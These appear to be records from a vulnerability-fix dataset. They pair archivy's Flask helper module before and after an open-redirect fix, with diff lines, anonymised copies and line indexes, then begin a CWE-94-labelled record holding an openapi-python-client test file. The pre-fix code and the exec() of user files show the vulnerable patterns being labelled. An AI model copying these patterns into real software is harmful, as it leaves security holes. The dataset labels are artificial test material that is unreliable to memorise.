]
):
parent_dict.pop(curr_key)
return 0
else:
if defaults[curr_key] == curr_val:
parent_dict.pop(curr_key)
return 0
return 1
def write_config(config: dict):
"""
Writes a new config dict to a `config.yml` file that will override defaults.
Compares user config with defaults to only save changes.
"""
defaults = vars(Config())
for k, v in list(config.items()):
if k != "SECRET_KEY":
config_diff(k, v, config, defaults)
with (Path(current_app.config["INTERNAL_DIR"]) / "config.yml").open("w") as f:
yaml.dump(config, f)
def load_hooks():
try:
user_hooks = (Path(current_app.config["USER_DIR"]) / "hooks.py").open()
except FileNotFoundError:
return BaseHooks()
user_locals = {}
exec(user_hooks.read(), globals(), user_locals)
user_hooks.close()
return user_locals.get("Hooks", BaseHooks)()
def load_scraper():
try:
user_scraping = (Path(current_app.config["USER_DIR"]) / "scraping.py").open()
except FileNotFoundError:
return {}
user_locals = {}
exec(user_scraping.read(), globals(), user_locals)
user_scraping.close()
return user_locals.get("PATTERNS", {})
def get_db(force_reconnect=False):
"""
Returns the database object that you can use to
store data persistently
"""
if "db" not in g or force_reconnect:
g.db = TinyDB(str(Path(current_app.config["INTERNAL_DIR"]) / "db.json"))
return g.db
def get_max_id():
"""Returns the current maximum id of dataobjs in the database."""
db = get_db()
max_id = db.search(Query().name == "max_id")
if not max_id:
db.insert({"name": "max_id", "val": 0})
return 0
return max_id[0]["val"]
def set_max_id(val):
"""Sets a new max_id"""
db = get_db()
db.update(operations.set("val", val), Query().name == "max_id")
def test_es_connection(es):
"""Tests health and presence of connection to elasticsearch."""
try:
health = es.cluster.health()
except elasticsearch.exceptions.ConnectionError:
current_app.logger.error(
"Elasticsearch does not seem to be running on "
f"{current_app.config['SEARCH_CONF']['url']}. Please start "
"it, for example with: sudo service elasticsearch restart"
)
current_app.logger.error(
"You can disable Elasticsearch by modifying the `enabled` variable "
f"in {str(Path(current_app.config['INTERNAL_DIR']) / 'config.yml')}"
)
sys.exit(1)
if health["status"] not in ("yellow", "green"):
current_app.logger.warning(
"Elasticsearch reports that it is not working "
"properly. Search might not work. You can disable "
"Elasticsearch by setting ELASTICSEARCH_ENABLED to 0."
)
def get_elastic_client(error_if_invalid=True):
"""Returns the elasticsearch client you can use to search and insert / delete data"""
if (
not current_app.config["SEARCH_CONF"]["enabled"]
or current_app.config["SEARCH_CONF"]["engine"] != "elasticsearch"
) and error_if_invalid:
return None
auth_setup = (
current_app.config["SEARCH_CONF"]["es_user"]
and current_app.config["SEARCH_CONF"]["es_password"]
)
if auth_setup:
es = Elasticsearch(
current_app.config["SEARCH_CONF"]["url"],
http_auth=(
current_app.config["SEARCH_CONF"]["es_user"],
current_app.config["SEARCH_CONF"]["es_password"],
),
)
else:
es = Elasticsearch(current_app.config["SEARCH_CONF"]["url"])
if error_if_invalid:
test_es_connection(es)
else:
try:
es.cluster.health()
except elasticsearch.exceptions.ConnectionError:
return False
return es
def create_plugin_dir(name):
"""Creates a sample plugin directory"""
raw_name = name.replace("archivy_", "").replace("archivy-", "")
try:
os.makedirs(f"{name}/{name}")
# Creates requirements.txt.
with open(f"{name}/requirements.txt", "w") as fp:
fp.writelines(["archivy", "\nclick"])
# Creates an empty readme file to be filled
with open(f"{name}/README.md", "w+") as fp:
fp.writelines(
[
f"# {name}",
"\n\n## Install",
"\n\nYou need to have `archivy` already installed.",
f"\n\nRun `pip install archivy_{name}`",
"\n\n## Usage",
]
)
# Creates a setup.py file
with open(f"{name}/setup.py", "w") as setup_f:
setup_f.writelines(
[
"from setuptools import setup, find_packages",
'\n\nwith open("README.md", "r") as fh:',
"\n\tlong_description = fh.read()",
'\n\nwith open("requirements.txt", encoding="utf-8") as f:',
'\n\tall_reqs = f.read().split("\\n")',
"\n\tinstall_requires = [x.strip() for x in all_reqs]",
"\n\n#Fill in the details below for distribution purposes"
f'\nsetup(\n\tname="{name}",',
'\n\tversion="0.0.1",',
'\n\tauthor="",',
'\n\tauthor_email="",',
'\n\tdescription="",',
"\n\tlong_description=long_description,",
'\n\tlong_description_content_type="text/markdown",',
'\n\tclassifiers=["Programming Language :: Python :: 3"],'
"\n\tpackages=find_packages(),",
"\n\tinstall_requires=install_requires,",
f'\n\tentry_points="""\n\t\t[archivy.plugins]'
f'\n\t\t{raw_name}={name}:{raw_name}"""\n)',
]
)
# Creating a basic __init__.py file where the main function of the plugin goes
with open(f"{name}/{name}/__init__.py", "w") as fp:
fp.writelines(
[
"import archivy",
"\nimport click",
"\n\n# Fill in the functionality for the commands (see https://archivy.github.io/plugins/)",
"\n@click.group()",
f"\ndef {raw_name}():",
"\n\tpass",
f"\n\n@{raw_name}.command()",
"\ndef command1():",
"\n\tpass",
f"\n\n@{raw_name}.command()",
"\ndef command2():",
"\n\tpass",
]
)
return True
except FileExistsError:
return False
| from pathlib import Path
import sys
import os
import elasticsearch
import yaml
from elasticsearch import Elasticsearch
from flask import current_app, g, request
from tinydb import TinyDB, Query, operations
from urllib.parse import urlparse, urljoin
from archivy.config import BaseHooks, Config
def load_config(path=""):
"""Loads `config.yml` file safely and deserializes it to a python dict."""
path = path or current_app.config["INTERNAL_DIR"]
with (Path(path) / "config.yml").open() as f:
return yaml.load(f.read(), Loader=yaml.SafeLoader)
def config_diff(curr_key, curr_val, parent_dict, defaults):
"""
This function diffs the user config with the defaults to only save what is actually different.
Returns 1 if the current element or its nested elements are different and have been preserved.
"""
if type(curr_val) is dict:
# the any call here diffs all nested children of the current dict and returns whether any have modifications
if not any(
[
config_diff(k, v, curr_val, defaults[curr_key])
for k, v in list(curr_val.items())
]
):
parent_dict.pop(curr_key)
return 0
else:
if defaults[curr_key] == curr_val:
parent_dict.pop(curr_key)
return 0
return 1
def write_config(config: dict):
"""
Writes a new config dict to a `config.yml` file that will override defaults.
Compares user config with defaults to only save changes.
"""
defaults = vars(Config())
for k, v in list(config.items()):
if k != "SECRET_KEY":
config_diff(k, v, config, defaults)
with (Path(current_app.config["INTERNAL_DIR"]) / "config.yml").open("w") as f:
yaml.dump(config, f)
def load_hooks():
try:
user_hooks = (Path(current_app.config["USER_DIR"]) / "hooks.py").open()
except FileNotFoundError:
return BaseHooks()
user_locals = {}
exec(user_hooks.read(), globals(), user_locals)
user_hooks.close()
return user_locals.get("Hooks", BaseHooks)()
def load_scraper():
try:
user_scraping = (Path(current_app.config["USER_DIR"]) / "scraping.py").open()
except FileNotFoundError:
return {}
user_locals = {}
exec(user_scraping.read(), globals(), user_locals)
user_scraping.close()
return user_locals.get("PATTERNS", {})
def get_db(force_reconnect=False):
"""
Returns the database object that you can use to
store data persistently
"""
if "db" not in g or force_reconnect:
g.db = TinyDB(str(Path(current_app.config["INTERNAL_DIR"]) / "db.json"))
return g.db
def get_max_id():
"""Returns the current maximum id of dataobjs in the database."""
db = get_db()
max_id = db.search(Query().name == "max_id")
if not max_id:
db.insert({"name": "max_id", "val": 0})
return 0
return max_id[0]["val"]
def set_max_id(val):
"""Sets a new max_id"""
db = get_db()
db.update(operations.set("val", val), Query().name == "max_id")
def test_es_connection(es):
"""Tests health and presence of connection to elasticsearch."""
try:
health = es.cluster.health()
except elasticsearch.exceptions.ConnectionError:
current_app.logger.error(
"Elasticsearch does not seem to be running on "
f"{current_app.config['SEARCH_CONF']['url']}. Please start "
"it, for example with: sudo service elasticsearch restart"
)
current_app.logger.error(
"You can disable Elasticsearch by modifying the `enabled` variable "
f"in {str(Path(current_app.config['INTERNAL_DIR']) / 'config.yml')}"
)
sys.exit(1)
if health["status"] not in ("yellow", "green"):
current_app.logger.warning(
"Elasticsearch reports that it is not working "
"properly. Search might not work. You can disable "
"Elasticsearch by setting ELASTICSEARCH_ENABLED to 0."
)
def get_elastic_client(error_if_invalid=True):
"""Returns the elasticsearch client you can use to search and insert / delete data"""
if (
not current_app.config["SEARCH_CONF"]["enabled"]
or current_app.config["SEARCH_CONF"]["engine"] != "elasticsearch"
) and error_if_invalid:
return None
auth_setup = (
current_app.config["SEARCH_CONF"]["es_user"]
and current_app.config["SEARCH_CONF"]["es_password"]
)
if auth_setup:
es = Elasticsearch(
current_app.config["SEARCH_CONF"]["url"],
http_auth=(
current_app.config["SEARCH_CONF"]["es_user"],
current_app.config["SEARCH_CONF"]["es_password"],
),
)
else:
es = Elasticsearch(current_app.config["SEARCH_CONF"]["url"])
if error_if_invalid:
test_es_connection(es)
else:
try:
es.cluster.health()
except elasticsearch.exceptions.ConnectionError:
return False
return es
def create_plugin_dir(name):
"""Creates a sample plugin directory"""
raw_name = name.replace("archivy_", "").replace("archivy-", "")
try:
os.makedirs(f"{name}/{name}")
# Creates requirements.txt.
with open(f"{name}/requirements.txt", "w") as fp:
fp.writelines(["archivy", "\nclick"])
# Creates an empty readme file to be filled
with open(f"{name}/README.md", "w+") as fp:
fp.writelines(
[
f"# {name}",
"\n\n## Install",
"\n\nYou need to have `archivy` already installed.",
f"\n\nRun `pip install archivy_{name}`",
"\n\n## Usage",
]
)
# Creates a setup.py file
with open(f"{name}/setup.py", "w") as setup_f:
setup_f.writelines(
[
"from setuptools import setup, find_packages",
'\n\nwith open("README.md", "r") as fh:',
"\n\tlong_description = fh.read()",
'\n\nwith open("requirements.txt", encoding="utf-8") as f:',
'\n\tall_reqs = f.read().split("\\n")',
"\n\tinstall_requires = [x.strip() for x in all_reqs]",
"\n\n#Fill in the details below for distribution purposes"
f'\nsetup(\n\tname="{name}",',
'\n\tversion="0.0.1",',
'\n\tauthor="",',
'\n\tauthor_email="",',
'\n\tdescription="",',
"\n\tlong_description=long_description,",
'\n\tlong_description_content_type="text/markdown",',
'\n\tclassifiers=["Programming Language :: Python :: 3"],'
"\n\tpackages=find_packages(),",
"\n\tinstall_requires=install_requires,",
f'\n\tentry_points="""\n\t\t[archivy.plugins]'
f'\n\t\t{raw_name}={name}:{raw_name}"""\n)',
]
)
# Creating a basic __init__.py file where the main function of the plugin goes
with open(f"{name}/{name}/__init__.py", "w") as fp:
fp.writelines(
[
"import archivy",
"\nimport click",
"\n\n# Fill in the functionality for the commands (see https://archivy.github.io/plugins/)",
"\n@click.group()",
f"\ndef {raw_name}():",
"\n\tpass",
f"\n\n@{raw_name}.command()",
"\ndef command1():",
"\n\tpass",
f"\n\n@{raw_name}.command()",
"\ndef command2():",
"\n\tpass",
]
)
return True
except FileExistsError:
return False
def is_safe_redirect_url(target):
host_url = urlparse(request.host_url)
redirect_url = urlparse(urljoin(request.host_url, target))
return (
redirect_url.scheme in ("http", "https")
and host_url.netloc == redirect_url.netloc
)
| open_redirect | {
"code": [
"from flask import current_app, g"
],
"line_no": [
8
]
} | {
"code": [
"from flask import current_app, g, request",
"def is_safe_redirect_url(target):",
" host_url = urlparse(request.host_url)",
" redirect_url = urlparse(urljoin(request.host_url, target))",
" return (",
" redirect_url.scheme in (\"http\", \"https\")",
" and host_url.netloc == redirect_url.netloc",
" )"
],
"line_no": [
8,
236,
237,
238,
239,
240,
241,
242
]
} | from pathlib import Path
import sys
import os
import elasticsearch
import yaml
from elasticsearch import Elasticsearch
from flask import current_app, g
from tinydb import TinyDB, Query, operations
from archivy.config import BaseHooks, Config
def FUNC_0(VAR_0=""):
VAR_0 = path or current_app.config["INTERNAL_DIR"]
with (Path(VAR_0) / "config.yml").open() as f:
return yaml.load(f.read(), Loader=yaml.SafeLoader)
def FUNC_1(VAR_1, VAR_2, VAR_3, VAR_4):
if type(VAR_2) is dict:
if not any(
[
FUNC_1(k, v, VAR_2, VAR_4[VAR_1])
for k, v in list(VAR_2.items())
]
):
VAR_3.pop(VAR_1)
return 0
else:
if VAR_4[VAR_1] == VAR_2:
VAR_3.pop(VAR_1)
return 0
return 1
def FUNC_2(VAR_5: dict):
VAR_4 = vars(Config())
for k, v in list(VAR_5.items()):
if k != "SECRET_KEY":
FUNC_1(k, v, VAR_5, VAR_4)
with (Path(current_app.config["INTERNAL_DIR"]) / "config.yml").open("w") as f:
yaml.dump(VAR_5, f)
def FUNC_3():
try:
VAR_16 = (Path(current_app.config["USER_DIR"]) / "hooks.py").open()
except FileNotFoundError:
return BaseHooks()
VAR_11 = {}
exec(VAR_16.read(), globals(), VAR_11)
VAR_16.close()
return VAR_11.get("Hooks", BaseHooks)()
def FUNC_4():
try:
VAR_17 = (Path(current_app.config["USER_DIR"]) / "scraping.py").open()
except FileNotFoundError:
return {}
VAR_11 = {}
exec(VAR_17.read(), globals(), VAR_11)
VAR_17.close()
return VAR_11.get("PATTERNS", {})
def FUNC_5(VAR_6=False):
if "db" not in g or VAR_6:
g.db = TinyDB(str(Path(current_app.config["INTERNAL_DIR"]) / "db.json"))
return g.db
def FUNC_6():
VAR_12 = FUNC_5()
VAR_13 = VAR_12.search(Query().name == "max_id")
if not VAR_13:
VAR_12.insert({"name": "max_id", "val": 0})
return 0
return VAR_13[0]["val"]
def FUNC_7(VAR_7):
VAR_12 = FUNC_5()
VAR_12.update(operations.set("val", VAR_7), Query().name == "max_id")
def FUNC_8(VAR_8):
try:
VAR_18 = VAR_8.cluster.health()
except elasticsearch.exceptions.ConnectionError:
current_app.logger.error(
"Elasticsearch does not seem to be running on "
f"{current_app.config['SEARCH_CONF']['url']}. Please start "
"it, for example with: sudo service elasticsearch restart"
)
current_app.logger.error(
"You can disable Elasticsearch by modifying the `enabled` variable "
f"in {str(Path(current_app.config['INTERNAL_DIR']) / 'config.yml')}"
)
sys.exit(1)
if VAR_18["status"] not in ("yellow", "green"):
current_app.logger.warning(
"Elasticsearch reports that it is not working "
"properly. Search might not work. You can disable "
"Elasticsearch by setting ELASTICSEARCH_ENABLED to 0."
)
def FUNC_9(VAR_9=True):
if (
not current_app.config["SEARCH_CONF"]["enabled"]
or current_app.config["SEARCH_CONF"]["engine"] != "elasticsearch"
) and VAR_9:
return None
VAR_14 = (
current_app.config["SEARCH_CONF"]["es_user"]
and current_app.config["SEARCH_CONF"]["es_password"]
)
if VAR_14:
VAR_8 = Elasticsearch(
current_app.config["SEARCH_CONF"]["url"],
http_auth=(
current_app.config["SEARCH_CONF"]["es_user"],
current_app.config["SEARCH_CONF"]["es_password"],
),
)
else:
VAR_8 = Elasticsearch(current_app.config["SEARCH_CONF"]["url"])
if VAR_9:
FUNC_8(VAR_8)
else:
try:
VAR_8.cluster.health()
except elasticsearch.exceptions.ConnectionError:
return False
return VAR_8
def FUNC_10(VAR_10):
VAR_15 = VAR_10.replace("archivy_", "").replace("archivy-", "")
try:
os.makedirs(f"{VAR_10}/{VAR_10}")
with open(f"{VAR_10}/requirements.txt", "w") as fp:
fp.writelines(["archivy", "\nclick"])
with open(f"{VAR_10}/README.md", "w+") as fp:
fp.writelines(
[
f"# {VAR_10}",
"\n\n## Install",
"\n\nYou need to have `archivy` already installed.",
f"\n\nRun `pip install archivy_{VAR_10}`",
"\n\n## Usage",
]
)
with open(f"{VAR_10}/setup.py", "w") as setup_f:
setup_f.writelines(
[
"from setuptools import setup, find_packages",
'\n\nwith open("README.md", "r") as fh:',
"\n\tlong_description = fh.read()",
'\n\nwith open("requirements.txt", encoding="utf-8") as f:',
'\n\tall_reqs = f.read().split("\\n")',
"\n\tinstall_requires = [x.strip() for x in all_reqs]",
"\n\n#Fill in the details below for distribution purposes"
f'\nsetup(\n\tname="{VAR_10}",',
'\n\tversion="0.0.1",',
'\n\tauthor="",',
'\n\tauthor_email="",',
'\n\tdescription="",',
"\n\tlong_description=long_description,",
'\n\tlong_description_content_type="text/markdown",',
'\n\tclassifiers=["Programming Language :: Python :: 3"],'
"\n\tpackages=find_packages(),",
"\n\tinstall_requires=install_requires,",
f'\n\tentry_points="""\n\t\t[archivy.plugins]'
f'\n\t\t{VAR_15}={VAR_10}:{VAR_15}"""\n)',
]
)
with open(f"{VAR_10}/{VAR_10}/__init__.py", "w") as fp:
fp.writelines(
[
"import archivy",
"\nimport click",
"\n\n# Fill in the functionality for the commands (see https://archivy.github.io/plugins/)",
"\n@click.group()",
f"\ndef {VAR_15}():",
"\n\tpass",
f"\n\n@{VAR_15}.command()",
"\ndef command1():",
"\n\tpass",
f"\n\n@{VAR_15}.command()",
"\ndef command2():",
"\n\tpass",
]
)
return True
except FileExistsError:
return False
| from pathlib import Path
import sys
import os
import elasticsearch
import yaml
from elasticsearch import Elasticsearch
from flask import current_app, g, request
from tinydb import TinyDB, Query, operations
from urllib.parse import urlparse, urljoin
from archivy.config import BaseHooks, Config
def FUNC_0(VAR_0=""):
VAR_0 = path or current_app.config["INTERNAL_DIR"]
with (Path(VAR_0) / "config.yml").open() as f:
return yaml.load(f.read(), Loader=yaml.SafeLoader)
def FUNC_1(VAR_1, VAR_2, VAR_3, VAR_4):
if type(VAR_2) is dict:
if not any(
[
FUNC_1(k, v, VAR_2, VAR_4[VAR_1])
for k, v in list(VAR_2.items())
]
):
VAR_3.pop(VAR_1)
return 0
else:
if VAR_4[VAR_1] == VAR_2:
VAR_3.pop(VAR_1)
return 0
return 1
def FUNC_2(VAR_5: dict):
VAR_4 = vars(Config())
for k, v in list(VAR_5.items()):
if k != "SECRET_KEY":
FUNC_1(k, v, VAR_5, VAR_4)
with (Path(current_app.config["INTERNAL_DIR"]) / "config.yml").open("w") as f:
yaml.dump(VAR_5, f)
def FUNC_3():
try:
VAR_19 = (Path(current_app.config["USER_DIR"]) / "hooks.py").open()
except FileNotFoundError:
return BaseHooks()
VAR_12 = {}
exec(VAR_19.read(), globals(), VAR_12)
VAR_19.close()
return VAR_12.get("Hooks", BaseHooks)()
def FUNC_4():
try:
VAR_20 = (Path(current_app.config["USER_DIR"]) / "scraping.py").open()
except FileNotFoundError:
return {}
VAR_12 = {}
exec(VAR_20.read(), globals(), VAR_12)
VAR_20.close()
return VAR_12.get("PATTERNS", {})
def FUNC_5(VAR_6=False):
if "db" not in g or VAR_6:
g.db = TinyDB(str(Path(current_app.config["INTERNAL_DIR"]) / "db.json"))
return g.db
def FUNC_6():
VAR_13 = FUNC_5()
VAR_14 = VAR_13.search(Query().name == "max_id")
if not VAR_14:
VAR_13.insert({"name": "max_id", "val": 0})
return 0
return VAR_14[0]["val"]
def FUNC_7(VAR_7):
VAR_13 = FUNC_5()
VAR_13.update(operations.set("val", VAR_7), Query().name == "max_id")
def FUNC_8(VAR_8):
try:
VAR_21 = VAR_8.cluster.health()
except elasticsearch.exceptions.ConnectionError:
current_app.logger.error(
"Elasticsearch does not seem to be running on "
f"{current_app.config['SEARCH_CONF']['url']}. Please start "
"it, for example with: sudo service elasticsearch restart"
)
current_app.logger.error(
"You can disable Elasticsearch by modifying the `enabled` variable "
f"in {str(Path(current_app.config['INTERNAL_DIR']) / 'config.yml')}"
)
sys.exit(1)
if VAR_21["status"] not in ("yellow", "green"):
current_app.logger.warning(
"Elasticsearch reports that it is not working "
"properly. Search might not work. You can disable "
"Elasticsearch by setting ELASTICSEARCH_ENABLED to 0."
)
def FUNC_9(VAR_9=True):
if (
not current_app.config["SEARCH_CONF"]["enabled"]
or current_app.config["SEARCH_CONF"]["engine"] != "elasticsearch"
) and VAR_9:
return None
VAR_15 = (
current_app.config["SEARCH_CONF"]["es_user"]
and current_app.config["SEARCH_CONF"]["es_password"]
)
if VAR_15:
VAR_8 = Elasticsearch(
current_app.config["SEARCH_CONF"]["url"],
http_auth=(
current_app.config["SEARCH_CONF"]["es_user"],
current_app.config["SEARCH_CONF"]["es_password"],
),
)
else:
VAR_8 = Elasticsearch(current_app.config["SEARCH_CONF"]["url"])
if VAR_9:
FUNC_8(VAR_8)
else:
try:
VAR_8.cluster.health()
except elasticsearch.exceptions.ConnectionError:
return False
return VAR_8
def FUNC_10(VAR_10):
VAR_16 = VAR_10.replace("archivy_", "").replace("archivy-", "")
try:
os.makedirs(f"{VAR_10}/{VAR_10}")
with open(f"{VAR_10}/requirements.txt", "w") as fp:
fp.writelines(["archivy", "\nclick"])
with open(f"{VAR_10}/README.md", "w+") as fp:
fp.writelines(
[
f"# {VAR_10}",
"\n\n## Install",
"\n\nYou need to have `archivy` already installed.",
f"\n\nRun `pip install archivy_{VAR_10}`",
"\n\n## Usage",
]
)
with open(f"{VAR_10}/setup.py", "w") as setup_f:
setup_f.writelines(
[
"from setuptools import setup, find_packages",
'\n\nwith open("README.md", "r") as fh:',
"\n\tlong_description = fh.read()",
'\n\nwith open("requirements.txt", encoding="utf-8") as f:',
'\n\tall_reqs = f.read().split("\\n")',
"\n\tinstall_requires = [x.strip() for x in all_reqs]",
"\n\n#Fill in the details below for distribution purposes"
f'\nsetup(\n\tname="{VAR_10}",',
'\n\tversion="0.0.1",',
'\n\tauthor="",',
'\n\tauthor_email="",',
'\n\tdescription="",',
"\n\tlong_description=long_description,",
'\n\tlong_description_content_type="text/markdown",',
'\n\tclassifiers=["Programming Language :: Python :: 3"],'
"\n\tpackages=find_packages(),",
"\n\tinstall_requires=install_requires,",
f'\n\tentry_points="""\n\t\t[archivy.plugins]'
f'\n\t\t{VAR_16}={VAR_10}:{VAR_16}"""\n)',
]
)
with open(f"{VAR_10}/{VAR_10}/__init__.py", "w") as fp:
fp.writelines(
[
"import archivy",
"\nimport click",
"\n\n# Fill in the functionality for the commands (see https://archivy.github.io/plugins/)",
"\n@click.group()",
f"\ndef {VAR_16}():",
"\n\tpass",
f"\n\n@{VAR_16}.command()",
"\ndef command1():",
"\n\tpass",
f"\n\n@{VAR_16}.command()",
"\ndef command2():",
"\n\tpass",
]
)
return True
except FileExistsError:
return False
def FUNC_11(VAR_11):
VAR_17 = urlparse(request.host_url)
VAR_18 = urlparse(urljoin(request.host_url, VAR_11))
return (
VAR_18.scheme in ("http", "https")
and VAR_17.netloc == VAR_18.netloc
)
| [
4,
10,
12,
13,
19,
20,
24,
28,
42,
43,
55,
56,
62,
67,
68,
78,
79,
87,
89,
90,
99,
100,
105,
106,
122,
129,
130,
138,
161,
162,
168,
169,
172,
173,
184,
185,
210,
211,
229,
233,
15,
22,
23,
24,
25,
26,
45,
46,
47,
48,
81,
82,
83,
84,
92,
102,
108,
132,
164
] | [
4,
11,
13,
14,
20,
21,
25,
29,
43,
44,
56,
57,
63,
68,
69,
79,
80,
88,
90,
91,
100,
101,
106,
107,
123,
130,
131,
139,
162,
163,
169,
170,
173,
174,
185,
186,
211,
212,
230,
234,
235,
243,
16,
23,
24,
25,
26,
27,
46,
47,
48,
49,
82,
83,
84,
85,
93,
103,
109,
133,
165
] |
5CWE-94
| from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
import openapi_python_client.schema as oai
from openapi_python_client import GeneratorError
from openapi_python_client.parser.errors import ParseError
MODULE_NAME = "openapi_python_client.parser.openapi"
class TestGeneratorData:
def test_from_dict(self, mocker):
Schemas = mocker.patch(f"{MODULE_NAME}.Schemas")
EndpointCollection = mocker.patch(f"{MODULE_NAME}.EndpointCollection")
OpenAPI = mocker.patch(f"{MODULE_NAME}.oai.OpenAPI")
openapi = OpenAPI.parse_obj.return_value
in_dict = mocker.MagicMock()
get_all_enums = mocker.patch(f"{MODULE_NAME}.EnumProperty.get_all_enums")
from openapi_python_client.parser.openapi import GeneratorData
generator_data = GeneratorData.from_dict(in_dict)
OpenAPI.parse_obj.assert_called_once_with(in_dict)
Schemas.build.assert_called_once_with(schemas=openapi.components.schemas)
EndpointCollection.from_data.assert_called_once_with(data=openapi.paths)
get_all_enums.assert_called_once_with()
assert generator_data == GeneratorData(
title=openapi.info.title,
description=openapi.info.description,
version=openapi.info.version,
endpoint_collections_by_tag=EndpointCollection.from_data.return_value,
schemas=Schemas.build.return_value,
enums=get_all_enums.return_value,
)
# Test no components
openapi.components = None
Schemas.build.reset_mock()
generator_data = GeneratorData.from_dict(in_dict)
Schemas.build.assert_not_called()
assert generator_data.schemas == Schemas()
def test_from_dict_invalid_schema(self, mocker):
Schemas = mocker.patch(f"{MODULE_NAME}.Schemas")
in_dict = {}
from openapi_python_client.parser.openapi import GeneratorData
generator_data = GeneratorData.from_dict(in_dict)
assert generator_data == GeneratorError(
header="Failed to parse OpenAPI document",
detail=(
"2 validation errors for OpenAPI\n"
"info\n"
" field required (type=value_error.missing)\n"
"paths\n"
" field required (type=value_error.missing)"
),
)
Schemas.build.assert_not_called()
Schemas.assert_not_called()
class TestModel:
def test_from_data(self, mocker):
from openapi_python_client.parser.properties import Property
in_data = oai.Schema.construct(
title=mocker.MagicMock(),
description=mocker.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": mocker.MagicMock(), "OptionalDateTime": mocker.MagicMock(),},
)
required_property = mocker.MagicMock(autospec=Property)
required_imports = mocker.MagicMock()
required_property.get_imports.return_value = {required_imports}
optional_property = mocker.MagicMock(autospec=Property)
optional_imports = mocker.MagicMock()
optional_property.get_imports.return_value = {optional_imports}
property_from_data = mocker.patch(
f"{MODULE_NAME}.property_from_data", side_effect=[required_property, optional_property],
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
result = Model.from_data(data=in_data, name=mocker.MagicMock())
from_ref.assert_called_once_with(in_data.title)
property_from_data.assert_has_calls(
[
mocker.call(name="RequiredEnum", required=True, data=in_data.properties["RequiredEnum"]),
mocker.call(name="OptionalDateTime", required=False, data=in_data.properties["OptionalDateTime"]),
]
)
required_property.get_imports.assert_called_once_with(prefix="")
optional_property.get_imports.assert_called_once_with(prefix="")
assert result == Model(
reference=from_ref(),
required_properties=[required_property],
optional_properties=[optional_property],
relative_imports={required_imports, optional_imports,},
description=in_data.description,
)
def test_from_data_property_parse_error(self, mocker):
in_data = oai.Schema.construct(
title=mocker.MagicMock(),
description=mocker.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": mocker.MagicMock(), "OptionalDateTime": mocker.MagicMock(),},
)
parse_error = ParseError(data=mocker.MagicMock())
property_from_data = mocker.patch(f"{MODULE_NAME}.property_from_data", return_value=parse_error,)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
result = Model.from_data(data=in_data, name=mocker.MagicMock())
from_ref.assert_called_once_with(in_data.title)
property_from_data.assert_called_once_with(
name="RequiredEnum", required=True, data=in_data.properties["RequiredEnum"]
)
assert result == parse_error
class TestSchemas:
def test_build(self, mocker):
from_data = mocker.patch(f"{MODULE_NAME}.Model.from_data")
in_data = {"1": mocker.MagicMock(enum=None), "2": mocker.MagicMock(enum=None), "3": mocker.MagicMock(enum=None)}
schema_1 = mocker.MagicMock()
schema_2 = mocker.MagicMock()
error = ParseError()
from_data.side_effect = [schema_1, schema_2, error]
from openapi_python_client.parser.openapi import Schemas
result = Schemas.build(schemas=in_data)
from_data.assert_has_calls([mocker.call(data=value, name=name) for (name, value) in in_data.items()])
assert result == Schemas(
models={schema_1.reference.class_name: schema_1, schema_2.reference.class_name: schema_2,}, errors=[error]
)
def test_build_parse_error_on_reference(self):
from openapi_python_client.parser.openapi import Schemas
ref_schema = oai.Reference.construct()
in_data = {1: ref_schema}
result = Schemas.build(schemas=in_data)
assert result.errors[0] == ParseError(data=ref_schema, detail="Reference schemas are not supported.")
def test_build_enums(self, mocker):
from openapi_python_client.parser.openapi import Schemas
from_data = mocker.patch(f"{MODULE_NAME}.Model.from_data")
enum_property = mocker.patch(f"{MODULE_NAME}.EnumProperty")
in_data = {"1": mocker.MagicMock(enum=["val1", "val2", "val3"])}
Schemas.build(schemas=in_data)
enum_property.assert_called()
from_data.assert_not_called()
class TestEndpoint:
def test_parse_request_form_body(self, mocker):
ref = mocker.MagicMock()
body = oai.RequestBody.construct(
content={
"application/x-www-form-urlencoded": oai.MediaType.construct(
media_type_schema=oai.Reference.construct(ref=ref)
)
}
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_form_body(body)
from_ref.assert_called_once_with(ref)
assert result == from_ref()
def test_parse_request_form_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_form_body(body)
assert result is None
def test_parse_multipart_body(self, mocker):
ref = mocker.MagicMock()
body = oai.RequestBody.construct(
content={"multipart/form-data": oai.MediaType.construct(media_type_schema=oai.Reference.construct(ref=ref))}
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_multipart_body(body)
from_ref.assert_called_once_with(ref)
assert result == from_ref()
def test_parse_multipart_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_multipart_body(body)
assert result is None
def test_parse_request_json_body(self, mocker):
schema = mocker.MagicMock()
body = oai.RequestBody.construct(
content={"application/json": oai.MediaType.construct(media_type_schema=schema)}
)
property_from_data = mocker.patch(f"{MODULE_NAME}.property_from_data")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_json_body(body)
property_from_data.assert_called_once_with("json_body", required=True, data=schema)
assert result == property_from_data()
def test_parse_request_json_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_json_body(body)
assert result is None
def test_add_body_no_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
parse_request_form_body = mocker.patch.object(Endpoint, "parse_request_form_body")
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
Endpoint._add_body(endpoint, oai.Operation.construct())
parse_request_form_body.assert_not_called()
def test_add_body_bad_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
mocker.patch.object(Endpoint, "parse_request_form_body")
parse_error = ParseError(data=mocker.MagicMock())
mocker.patch.object(Endpoint, "parse_request_json_body", return_value=parse_error)
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
request_body = mocker.MagicMock()
